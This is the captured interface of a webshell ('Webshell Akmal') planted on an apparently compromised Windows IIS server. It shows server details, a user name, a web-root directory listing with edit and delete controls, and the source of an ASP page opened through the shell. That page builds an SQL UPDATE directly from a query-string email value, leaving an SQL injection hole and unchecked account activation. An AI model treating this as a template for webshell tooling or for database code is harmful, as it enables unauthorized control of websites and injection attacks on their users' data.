Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!--#include file="conn.asp" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>�ޱ����ĵ�</title> <% UserEmail=request.QueryString("Email") set rs=server.createobject("adodb.recordset") sql="update UserInfo set Useful=1 where UserEmail='"&UserEmail&"'" conn.execute sql if conn.Errors.Count =0 then session("UserEmail")=UserEmail response.Write("<script>alert(""Your mailbox has been activated"");window.location.href=""index.asp"";</script>") else response.Write("<script>alert(""Something error,Please re-register"");window.location.href=""index.asp?ID=Register"";</script>") end if conn.close set conn=nothing %> </head> <body> </body> </html>